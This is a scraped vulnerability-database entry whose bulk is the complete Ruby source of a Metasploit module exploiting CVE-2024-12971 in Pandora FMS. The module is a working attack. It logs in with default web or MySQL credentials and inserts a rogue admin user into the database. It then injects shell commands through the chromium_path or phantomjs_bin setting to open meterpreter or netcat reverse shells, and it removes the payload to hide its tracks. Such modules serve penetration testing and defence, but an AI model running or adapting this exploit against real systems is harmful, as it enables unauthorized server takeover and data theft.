{“lastseen”:”2025-08-29T19:21:54″,”description”:”Pandora FMS is a monitoring solution that provides full observability for your organization\\u0026#x27;s technology. This module…”,”published”:”2025-08-29T18:53:34″,”modified”:”2025-04-08T18:54:14″,”type”:”metasploit”,”title”:”Pandora FMS authenticated command injection leading to RCE via chromium_path or phantomjs_bin”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-LINUX-HTTP-PANDORA_FMS_AUTH_RCE_CVE_2024_12971-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-12971″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nrequire ‘rex\/proto\/mysql\/client’\\nrequire ‘digest\/md5’\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include BCrypt\\n include Msf::Exploit::Remote::HttpClient\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n # @!attribute [rw] mysql_client\\n # @return [::Rex::Proto::MySQL::Client]\\n attr_accessor :mysql_client\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Pandora FMS authenticated command injection leading to RCE via chromium_path or phantomjs_bin’,\\n ‘Description’ =\\u003e %q{\\n Pandora FMS is a monitoring solution that provides full observability for your organization’s\\n technology. This module exploits an command injection vulnerability in the `chromium-path` or\\n `phantomjs-bin` directory setting at the application settings page of Pandora FMS.\\n You need have admin access at the Pandora FMS Web application in order to execute this RCE.\\n This access can be achieved by knowing the admin credentials to access the web application or\\n leveraging a default password vulnerability in Pandora FMS that allows an attacker to access\\n the Pandora FMS MySQL database, create a new admin user and gain administrative access to the\\n Pandora FMS Web application. This attack can be remotely executed over the WAN as long as the\\n MySQL services are exposed to the outside world.\\n This issue affects Community, Free and Enterprise editions:\\n – chromium-path: from v7.0NG.768 through \\u003c= v7.0NG.780\\n – phantomjs-bin: from v7.0NG.724 through \\u003c= v7.0NG.767\\n\\n Note: use target setting 2 \\”Tiny Reverse Netcat Command\\” for versions \\u003c= v7.0NG.738\\n },\\n ‘Author’ =\\u003e [\\n ‘h00die-gr3y \\u003ch00die.gr3y[at]gmail.com\\u003e’ # Discovery, Metasploit module \\u0026 default password weakness\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2024-12971’],\\n [‘URL’, ‘https:\/\/pandorafms.com\/en\/security\/common-vulnerabilities-and-exposures\/’],\\n [‘URL’, ‘https:\/\/attackerkb.com\/topics\/BJe14wkMYS\/cve-2024-12971’]\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’, ‘php’],\\n ‘Privileged’ =\\u003e false,\\n ‘Arch’ =\\u003e [ARCH_CMD, ARCH_PHP],\\n ‘Targets’ =\\u003e [\\n [\\n ‘PHP Command’,\\n {\\n ‘Platform’ =\\u003e ‘php’,\\n ‘Arch’ =\\u003e ARCH_PHP,\\n ‘Type’ =\\u003e :php_cmd,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘php\/meterpreter\/reverse_tcp’\\n },\\n ‘Payload’ =\\u003e {\\n ‘Encoder’ =\\u003e ‘php\/base64’,\\n ‘BadChars’ =\\u003e \\”\\\\x20\\”\\n }\\n }\\n ],\\n [\\n ‘Unix\/Linux Command’,\\n {\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Type’ =\\u003e :unix_cmd,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘cmd\/linux\/http\/x64\/meterpreter\/reverse_tcp’\\n },\\n ‘Payload’ =\\u003e {\\n ‘Encoder’ =\\u003e ‘cmd\/base64’,\\n ‘BadChars’ =\\u003e \\”\\\\x20\\”\\n }\\n }\\n ],\\n [\\n ‘Tiny Reverse Netcat Command (use THIS for versions \\u003c= v738)’,\\n {\\n ‘Platform’ =\\u003e [‘unix’],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Type’ =\\u003e :tiny_netcat_cmd,\\n ‘DefaultOptions’ =\\u003e {\\n ‘PAYLOAD’ =\\u003e ‘cmd\/unix\/reverse_netcat_gaping’\\n }\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2025-03-17’,\\n ‘DefaultOptions’ =\\u003e {\\n ‘SSL’ =\\u003e true,\\n ‘RPORT’ =\\u003e 443\\n },\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION]\\n }\\n )\\n )\\n register_options([\\n OptString.new(‘TARGETURI’, [true, ‘Path to the Pandora FMS application’, ‘\/pandora_console’]),\\n OptString.new(‘DB_USER’, [true, ‘Pandora database admin user’, ‘pandora’]),\\n OptString.new(‘DB_PASSWORD’, [true, ‘Pandora database admin password’, ‘Pandor4!’]),\\n OptString.new(‘DB_NAME’, [true, ‘Pandora database’, ‘pandora’]),\\n OptPort.new(‘DB_PORT’, [true, ‘MySQL database port’, 3306]),\\n OptString.new(‘USERNAME’, [false, ‘Pandora web admin user’, ‘admin’]),\\n OptString.new(‘PASSWORD’, [false, ‘Pandora web admin password’, ‘pandora’])\\n ])\\n end\\n\\n # MySQL login\\n # returns true if successful else false\\n def mysql_login(host, user, password, db, port)\\n begin\\n self.mysql_client = ::Rex::Proto::MySQL::Client.connect(host, user, password, db, port)\\n rescue Errno::ECONNREFUSED\\n print_error(‘Connection refused’)\\n return false\\n rescue ::Rex::Proto::MySQL::Client::ClientError\\n print_error(‘Connection timedout’)\\n return false\\n rescue Errno::ETIMEDOUT\\n print_error(‘Operation timedout’)\\n return false\\n rescue ::Rex::Proto::MySQL::Client::HostNotPrivileged\\n print_error(‘Unable to login from this host due to policy’)\\n return false\\n rescue ::Rex::Proto::MySQL::Client::AccessDeniedError\\n print_error(‘Access denied’)\\n return false\\n rescue StandardError =\\u003e e\\n print_error(\\”Unknown error: #{e.message}\\”)\\n return false\\n end\\n true\\n end\\n\\n # MySQL query\\n # returns query result if successful (can be nil) else returns false\\n def mysql_query(sql)\\n begin\\n res = mysql_client.query(sql)\\n rescue ::Rex::Proto::MySQL::Client::Error =\\u003e e\\n print_error(\\”MySQL Error: #{e.class} #{e}\\”)\\n return false\\n rescue Rex::ConnectionTimeout =\\u003e e\\n print_error(\\”Timeout: #{e.message}\\”)\\n return false\\n rescue StandardError =\\u003e e\\n print_error(\\”Unknown error: #{e.message}\\”)\\n return false\\n end\\n res\\n end\\n\\n # login at the Pandora FMS web application\\n # return true if login successful else false\\n def pandora_login(name, pwd)\\n # first login GET request to get csrf code\\n # in older versions of Pandora FMS this csrf code is not implemented\\n # but for the sake of simplicity we still execute this GET request\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘index.php’),\\n ‘keep_cookies’ =\\u003e true,\\n ‘vars_get’ =\\u003e {\\n ‘login’ =\\u003e 1\\n }\\n })\\n return false unless res\\u0026.code == 200\\n\\n # scrape \\u003cinput id=\\”hidden-csrf_code\\” name=\\”csrf_code\\” type=\\”hidden\\” value=\\”d3ec1cae43fba8259079038548093ba8\\” \/\\u003e\\n html = res.get_html_document\\n csrf_code_html = html.at(‘input[@id=\\”hidden-csrf_code\\”]’)\\n vprint_status(\\”csrf_code_html: #{csrf_code_html}\\”)\\n\\n csrf_attributes = csrf_code_html\\u0026.attributes\\n return false unless csrf_attributes\\n\\n csrf_code = csrf_attributes[‘value’]\\n return false unless csrf_code\\n\\n vprint_status(\\”csrf_code: #{csrf_code}\\”)\\n\\n # second login POST request using the csrf code\\n # csrf_code can be nil in older versions where the csrf_code is not implemented\\n res = send_request_cgi!({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘index.php’),\\n ‘keep_cookies’ =\\u003e true,\\n ‘vars_get’ =\\u003e {\\n ‘login’ =\\u003e 1\\n },\\n ‘vars_post’ =\\u003e {\\n ‘nick’ =\\u003e name,\\n ‘pass’ =\\u003e pwd,\\n ‘Login_button’ =\\u003e \\”Let’s go\\”,\\n ‘csrf_code’ =\\u003e csrf_code\\n }\\n })\\n return false unless res\\u0026.code == 200\\n\\n res.body.include?(‘id=\\”welcome-icon-header\\”‘) || res.body.include?(‘id=\\”welcome_panel\\”‘) || res.body.include?(‘godmode’)\\n end\\n\\n # configure directory path setting based on the path_setting chromium_path or phantomjs_bin.\\n # return true if successful else false\\n def configure_path_setting(path, path_setting)\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘index.php’),\\n ‘keep_cookies’ =\\u003e true,\\n ‘vars_get’ =\\u003e {\\n ‘sec’ =\\u003e ‘gsetup’,\\n ‘sec2’ =\\u003e ‘godmode\/setup\/setup’,\\n ‘section’ =\\u003e ‘general’,\\n ‘pure’ =\\u003e nil\\n },\\n ‘vars_post’ =\\u003e {\\n ‘update_config’ =\\u003e 1,\\n ‘remote_config’ =\\u003e ‘\/var\/spool\/pandora\/data_in’,\\n ‘general_network_path’ =\\u003e ‘\/var\/spool\/pandora\/data_in’,\\n ‘check_conexion_interval’ =\\u003e 180,\\n path_setting.to_s =\\u003e path.to_s,\\n ‘update_button’ =\\u003e ‘Update’\\n }\\n })\\n return res\\u0026.code == 200\\n end\\n\\n # CVE-2024-12971: Command Injection leading to RCE via chromium_path or phantomjs_bin setting\\n def execute_command(cmd, vuln_path_setting, _opts = {})\\n case target[‘Type’]\\n when :php_cmd\\n payload = \\”\/;php${IFS}-r\\\\\\”#{cmd}\\\\\\”;\\”\\n when :unix_cmd\\n payload = \\”\/;#{cmd};\\”\\n when :tiny_netcat_cmd\\n payload = \\”\/;#{cmd.gsub(‘ ‘, ‘${IFS}’)};\\”\\n else\\n fail_with(Failure::BadConfig, \\”Unsupported target type: #{target[‘Type’]}.\\”)\\n end\\n vprint_status(\\”payload: #{payload}\\”)\\n @clean_payload = true\\n configure_path_setting(payload, vuln_path_setting)\\n end\\n\\n def cleanup\\n # try to remove the payload from the path settings to cover our tracks\\n # but do not run during the check phase\\n super\\n unless @check_running\\n # Disconnect from MySQL server\\n mysql_client.close if mysql_client\\n # check if payload should be removed\\n if @clean_payload\\n if @vuln_path_setting == ‘chromium_path’\\n res = configure_path_setting(‘\/usr\/bin\/chromium-browser’, @vuln_path_setting)\\n else\\n res = configure_path_setting(‘\/usr\/bin’, @vuln_path_setting)\\n end\\n if res\\n print_good(\\”Payload is successful removed from #{@vuln_path_setting} path configuration.\\”)\\n else\\n print_warning(\\”Payload might not be removed from #{@vuln_path_setting} path configuration. Check and try to clean it manually.\\”)\\n end\\n end\\n end\\n end\\n\\n def check\\n @check_running = true\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘index.php’),\\n ‘keep_cookies’ =\\u003e true\\n })\\n return CheckCode::Unknown(‘Received unknown response.’) unless res\\u0026.code == 200\\n unless res.body.include?(‘PandoraFMS.com’) || res.body.include?(‘Pandora FMS’)\\n return CheckCode::Safe(‘Target is not a Pandora FMS application.’)\\n end\\n\\n html = res.get_html_document\\n full_version = html.at(‘div[@id=\\”ver_num\\”]’)\\n if full_version.blank?\\n @vuln_path_setting = ‘chromium_path’\\n return CheckCode::Detected(\\”Could not determine the Pandora FMS version. Use exploit with #{@vuln_path_setting} RCE\\”)\\n end\\n\\n full_version = full_version.text\\n version = full_version[1..].sub(‘NG’, ”)\\n if version.blank?\\n @vuln_path_setting = ‘chromium_path’\\n return CheckCode::Detected(\\”Could not determine the Pandora FMS version. Use exploit with #{@vuln_path_setting} RCE\\”)\\n end\\n\\n version = Rex::Version.new(version)\\n # check if version is between v7.0NG.768 and v7.0NG.780 where the chromium_path setting is vulnerable\\n if version \\u003e= Rex::Version.new(‘7.0.768’) \\u0026\\u0026 version \\u003c= Rex::Version.new(‘7.0.780’)\\n @vuln_path_setting = ‘chromium_path’\\n return CheckCode::Appears(\\”Found #{@vuln_path_setting} RCE. Pandora FMS version #{full_version}\\”)\\n end\\n # check if version is between v7.0NG.724 and v7.0NG.767 where the phantomjs_bin setting is vulnerable\\n if version \\u003e= Rex::Version.new(‘7.0.724’) \\u0026\\u0026 version \\u003c= Rex::Version.new(‘7.0.767’)\\n @vuln_path_setting = ‘phantomjs_bin’\\n return CheckCode::Appears(\\”Found #{@vuln_path_setting} RCE. Pandora FMS version #{full_version}\\”)\\n end\\n CheckCode::Safe(\\”Pandora FMS version #{full_version}\\”)\\n end\\n\\n def exploit\\n @check_running = false\\n @vuln_path_setting = ‘chromium_path’ if @vuln_path_setting.nil?\\n\\n # check if we can login at the Pandora Web application with the default admin credentials\\n username = datastore[‘USERNAME’]\\n password = datastore[‘PASSWORD’]\\n print_status(\\”Trying to log in with admin credentials #{username}:#{password} at the Pandora FMS Web application.\\”)\\n unless pandora_login(username, password)\\n # connect to the PostgreSQL DB with default credentials\\n print_status(‘Logging in with admin credentials failed. Trying to connect to the Pandora MySQL server.’)\\n mysql_login_res = mysql_login(datastore[‘RHOSTS’], datastore[‘DB_USER’], datastore[‘DB_PASSWORD’], datastore[‘DB_NAME’], datastore[‘DB_PORT’])\\n fail_with(Failure::Unreachable, \\”Unable to connect to the MySQL server on port #{datastore[‘DB_PORT’]}.\\”) unless mysql_login_res\\n\\n # add a new admin user\\n username = Rex::Text.rand_text_alphanumeric(5..8).downcase\\n password = Rex::Text.rand_password\\n\\n # check the password hash algorithm by reading the password hash of the admin user\\n # new pandora versions hashes the password in bcrypt $2*$, Blowfish (Unix) format else it is a plain MD5 hash\\n mysql_query_res = mysql_query(\\”SELECT password FROM tusuario WHERE id_user = ‘admin’;\\”)\\n fail_with(Failure::BadConfig, ‘Cannot find admin credentials to determine password hash algorithm.’) if mysql_query_res == false || mysql_query_res.size != 1\\n hash = mysql_query_res.fetch_hash\\n if hash[‘password’].match(\/^\\\\$2.\\\\$\/)\\n password_hash = Password.create(password)\\n else\\n password_hash = Digest::MD5.hexdigest(password)\\n end\\n print_status(\\”Creating new admin user with credentials #{username}:#{password} for access at the Pandora FMS Web application.\\”)\\n mysql_query_res = mysql_query(\\”INSERT INTO tusuario (id_user, password, is_admin) VALUES (\\\\’#{username}\\\\’, \\\\’#{password_hash}\\\\’, ‘1’);\\”)\\n fail_with(Failure::BadConfig, \\”Adding new admin credentials #{username}:#{password} to the database failed.\\”) if mysql_query_res == false\\n\\n # log in with the new admin user credentials at the Pandora FMS Web application\\n print_status(\\”Trying to log in with new admin credentials #{username}:#{password} at the Pandora FMS Web application.\\”)\\n fail_with(Failure::NoAccess, ‘Failed to authenticate at the Pandora FMS application.’) unless pandora_login(username, password)\\n end\\n print_status(‘Succesfully authenticated at the Pandora FMS Web application.’)\\n\\n # storing credentials at the msf database\\n print_status(‘Saving admin credentials at the msf database.’)\\n store_valid_credential(user: username, private: password)\\n\\n print_status(\\”Executing #{target.name} for #{datastore[‘PAYLOAD’]}\\”)\\n case target[‘Type’]\\n when :unix_cmd, :php_cmd, :tiny_netcat_cmd\\n execute_command(payload.encoded, @vuln_path_setting)\\n else\\n fail_with(Failure::BadConfig, \\”Unsupported target type: #{target[‘Type’]}.\\”)\\n end\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/http\/pandora_fms_auth_rce_cve_2024_12971.rb”,”cvss”:{“score”:8.6,”severity”:”HIGH”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:H\/UI:N\/VC:H\/SC:L\/VI:H\/SI:L\/VA:L\/SA:L\/S:N\/AU:Y\/U:Green\/R:U\/V:C\/RE:L”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/http\/pandora_fms_auth_rce_cve_2024_12971\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-08-29T19:21:54″,”description”:”Pandora FMS is a monitoring solution that provides full observability for your organization\\u0026#x27;s technology. This module…”,”published”:”2025-08-29T18:53:34″,”modified”:”2025-04-08T18:54:14″,”type”:”metasploit”,”title”:”Pandora FMS authenticated command injection leading to RCE via chromium_path…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,81,12,15,169,13,7,11,5],"class_list":["post-15134","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-86","tag-exploit","tag-high","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n